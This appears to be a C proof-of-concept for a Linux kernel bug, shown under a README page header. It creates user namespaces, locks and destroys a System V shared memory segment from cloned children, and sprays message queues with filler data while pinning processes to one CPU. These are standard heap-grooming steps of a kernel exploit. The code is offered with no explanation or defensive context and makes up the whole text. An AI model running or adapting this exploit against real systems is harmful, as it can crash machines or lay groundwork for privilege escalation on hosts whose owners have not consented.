README.md
Rendering markdown...
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <linux/limits.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/msg.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <time.h>
#include <unistd.h>
#define SEGMENT_SIZE 0x132000
#define SPRAY_1024 1000
#define error_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)
#define NUM_DUMMY_CHILD 124
#define STACK_SIZE (1024 * 1024)
char child_stack[STACK_SIZE]; /* Space for child's stack */
int pid_dummy_childs[NUM_DUMMY_CHILD];
int segment_id;
int spray_1024_qids[SPRAY_1024];
int verbose;
void **stack_dummy_childs;
void *sh_mem;
typedef struct {
long mtype;
char mtext[1];
} msg;
int32_t make_queue(key_t key, int msgflg) {
int32_t result;
if ((result = msgget(key, msgflg)) == -1) {
perror("msgget failure");
exit(-1);
}
return result;
}
ssize_t get_msg(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg) {
ssize_t ret;
ret = msgrcv(msqid, msgp, msgsz, msgtyp, msgflg);
if (ret < 0) {
perror("msgrcv");
//exit(-1);
}
return ret;
}
void send_msg(int msqid, void *msgp, size_t msgsz, int msgflg) {
if (msgsnd(msqid, msgp, msgsz, msgflg) == -1) {
perror("msgsend failure");
//exit(-1);
}
return;
}
void generic_spray(uint64_t size, uint64_t count)
{
char buffer[0x2000] = {0}, recieved[0x2000] = {0};
msg *message = (msg *)buffer;
memset(buffer, 0x61, sizeof(buffer));
for (int i = 0; i < count; i++)
{
int spray = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);
send_msg(spray, message, size - 0x30, 0);
}
return;
}
static int block_shared_memory(void *arg)
{
printf("[*] BLOCK SHARED MEMORY CHILD EXECUTING\n");
shmctl(segment_id, SHM_LOCK, NULL);
printf("[!] BLOCK SHARED MEMORY CHILD EXIT\n");
exit(0);
}
/* Unused */
static int use_shared_memory(void *args) {
printf("USE SHARED MEMORY CHILD EXECUTING\n");
for (int i = 0; i < 10; i++) {
char *x = "bhoo";
memcpy(sh_mem, (void *)x, 3);
}
printf("USE SHARED MEMORY CHILD EXIT\n");
exit(0);
}
int dummy_child(void *args) {
// printf("DUMMY CHILD\n");
sleep(1);
int x = 2 + 5 + ((int)time(NULL) % 10);
exit(x);
}
void print_affinity() {
cpu_set_t mask;
long nproc, i;
if (sched_getaffinity(0, sizeof(cpu_set_t), &mask) == -1) {
perror("sched_getaffinity");
}
nproc = sysconf(_SC_NPROCESSORS_ONLN);
printf("[!] AFFINITY = ");
for (i = 0; i < nproc; i++) {
printf("%d ", CPU_ISSET(i, &mask));
}
printf("\n");
}
int main(int argc, char *argv[])
{
setvbuf(stdout, NULL, _IONBF, 0);
int flags;
pid_t child_pid, sprayer_1, sprayer_2;
cpu_set_t my_set, sprayer_1_set, sprayer_2_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set) == -1) {
perror("sched_setaffinity()");
exit(1);
}
print_affinity();
flags = CLONE_NEWUSER;
segment_id = shmget(IPC_PRIVATE, SEGMENT_SIZE, IPC_CREAT | IPC_EXCL | S_IRUSR | S_IWUSR);
sh_mem = (void *)shmat(segment_id, NULL, 0);
printf("[*] CREATED segment id: %d\t address: %p\n", segment_id, sh_mem);
printf("[!] CREATING BLOCK SHARED MEMORY CHILD\n");
child_pid = clone(block_shared_memory, child_stack + STACK_SIZE, flags | SIGCHLD, NULL);
if (child_pid == -1) {
error_exit("clone");
}
stack_dummy_childs = malloc(sizeof(void *) * NUM_DUMMY_CHILD);
for (int j = 0; j < NUM_DUMMY_CHILD; j++) {
stack_dummy_childs[j] = malloc(0x50);
pid_dummy_childs[j] = clone(dummy_child, stack_dummy_childs[j], flags | SIGCHLD, NULL);
}
for (int j = 0; j < NUM_DUMMY_CHILD; j++) {
if (waitpid(pid_dummy_childs[j], NULL, 0) == -1) {
error_exit("waitpid");
}
}
if (waitpid(child_pid, NULL, 0) == -1) {
error_exit("waitpid");
}
sprayer_1 = fork();
if (sprayer_1 == 0) {
CPU_ZERO(&sprayer_1_set);
CPU_SET(0, &sprayer_1_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &sprayer_1_set) == -1) {
perror("sched_setaffinity()");
exit(1);
}
// printf("SPRAYER 1 AFFINITY: ");
// print_affinity();
generic_spray(1000, 10000);
exit(0);
} else {
sprayer_2 = fork();
if (sprayer_2 == 0) {
CPU_ZERO(&sprayer_2_set);
CPU_SET(0, &sprayer_2_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &sprayer_2_set) == -1) {
perror("sched_setaffinity()");
exit(1);
}
// printf("SPRAYER 2 AFFINITY: ");
// print_affinity();
generic_spray(1000, 10000);
exit(0);
}
}
wait(NULL);
generic_spray(1000, 1000);
printf("[*] DESTROY SHARED MEMORY\n");
shmdt(sh_mem);
shmctl(segment_id, IPC_RMID, 0);
printf("[!] DESTROYED SHARED MEMORY\n");
printf("[!] EXIT MAIN PROCESS\n");
exit(EXIT_SUCCESS);
}